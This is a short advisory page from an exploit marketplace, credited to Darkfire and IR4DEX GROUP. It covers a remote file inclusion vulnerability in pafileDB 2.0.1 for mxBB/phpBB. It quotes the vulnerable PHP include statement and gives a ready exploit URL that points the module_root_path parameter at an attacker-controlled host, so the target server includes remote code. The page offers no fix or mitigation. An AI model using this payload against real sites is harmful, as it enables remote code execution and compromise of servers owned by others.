[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion Vulnerability

Author
Darkfire
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-414
Category
web applications
Date add
10-05-2006
Platform
unsorted
==================================================================
pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion Vulnerability
==================================================================





# PafileDB Remote File Inclusion[phpBB]
#
# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com
# Risk : High
# Class : Remote
# Script : pafileDB
# Version : not specified

---------------------------------------------------------------------

Vulnerable code :

$link_language = 'lang_english';
    include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
---------------------------------------------------------------------

http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks



#  0day.today [2024-12-25]  #